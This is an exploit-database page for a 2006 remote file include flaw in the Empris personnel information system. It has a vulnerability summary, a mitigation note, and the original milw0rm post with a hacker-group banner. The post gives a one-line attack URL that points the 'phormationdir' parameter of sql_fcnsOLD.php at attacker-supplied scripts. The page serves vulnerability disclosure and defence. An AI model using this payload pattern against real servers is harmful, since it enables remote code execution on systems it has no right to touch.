header-logo
Suggest Exploit
vendor:
Emergenices Personnel Information System (Empris)
by:
Kacper (a.k.a Rahim)
9.3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Emergenices Personnel Information System (Empris)
Affected Version From: v.20020923 and prior
Affected Version To: v.20020923 and prior
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Emergenices Personnel Information System (Empris) [phormationdir] <= v.20020923 Remote File Include Vulnerability

A remote file include vulnerability exists in Emergenices Personnel Information System (Empris) version v.20020923 and prior. An attacker can exploit this vulnerability to include arbitrary files from remote locations by sending a specially crafted HTTP request containing directory traversal sequences and a malicious file name. This can lead to arbitrary code execution on the vulnerable system.

Mitigation:

Upgrade to the latest version of Emergenices Personnel Information System (Empris) or apply the appropriate patch.
Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  Emergenices Personnel Information System (Empris) [phormationdir] <= v.20020923 Remote File Include Vulnerability
$$  Script site: http://sourceforge.net/projects/empris
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:


http://www.site.com/[Empris_path]/phormation/sql_fcnsOLD.php?phormationdir=[evil_scripts]


#Pozdro dla wszystkich ;-)

# milw0rm.com [2006-06-10]

Navigation

Suggest Exploit

Services By CQR